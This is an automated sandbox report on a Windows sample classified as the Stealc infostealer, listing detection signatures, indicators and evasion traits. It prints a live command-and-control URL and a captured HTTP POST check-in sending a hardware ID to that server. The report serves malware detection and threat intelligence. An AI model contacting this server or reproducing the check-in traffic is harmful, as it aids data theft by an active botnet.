Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559392
MD5:d1f75fb0b0afd1ea41c2dccd9c3d2427
SHA1:6fdb92b4b415d69584ea1844ec2eed9f068f9640
SHA256:3eee56925a00f1e0162ec92e9e2cb827a2977a229aa8e6e303d24849ae6d6469
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D1F75FB0B0AFD1EA41C2DCCD9C3D2427)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000003.1330851446.0000000005210000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000002.1389602747.0000000000D6D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7708JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7708JoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T13:27:19.578027+010020442431Malware Command and Control Activity Detected192.168.2.749731185.215.113.20680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: http://185.215.113.206/c4becf79229cb002.phpftAvira URL Cloud: Label: malware
              Source: file.exe.7708.1.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Source: file.exeReversingLabs: Detection: 39%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00FF60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01006960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_01006960
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010140B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_010140B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01006B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_01006B79
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FFEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,1_2_00FFEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF9B80 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00FF9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00FF9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00FF4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00FF7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01003910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01003910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010018A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_010018A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01004B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01004B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01004B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_01004B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01002390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_01002390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010023A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_010023A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0100CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0100E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01001250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01001250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FFDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00FFDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01001269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01001269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FFDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00FFDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_0100DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0100D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00FF16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00FF16A0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49731 -> 185.215.113.206:80
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 37 46 33 46 35 37 41 38 36 43 31 31 38 30 30 38 36 39 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="hwid"167F3F57A86C118008692------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build"mars------DGHJECAFIDAFHJKFCGHI--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,1_2_00FF6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 37 46 33 46 35 37 41 38 36 43 31 31 38 30 30 38 36 39 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="hwid"167F3F57A86C118008692------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build"mars------DGHJECAFIDAFHJKFCGHI--
              Source: file.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/;
              Source: file.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/X
              Source: file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
              Source: file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpc
              Source: file.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpft
              Source: file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,1_2_00FF9770

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A31231_2_013A3123
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010148B01_2_010148B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A80D91_2_013A80D9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0131134E1_2_0131134E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0139FB951_2_0139FB95
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013732A21_2_013732A2
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0138BD741_2_0138BD74
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012A7DB81_2_012A7DB8
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01395C411_2_01395C41
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0134178A1_2_0134178A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013A9FFA1_2_013A9FFA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0148E7A31_2_0148E7A3
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013AD60C1_2_013AD60C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0146CE871_2_0146CE87
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FF4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: yuaygcvc ZLIB complexity 0.9945434795119705
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01013A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_01013A50
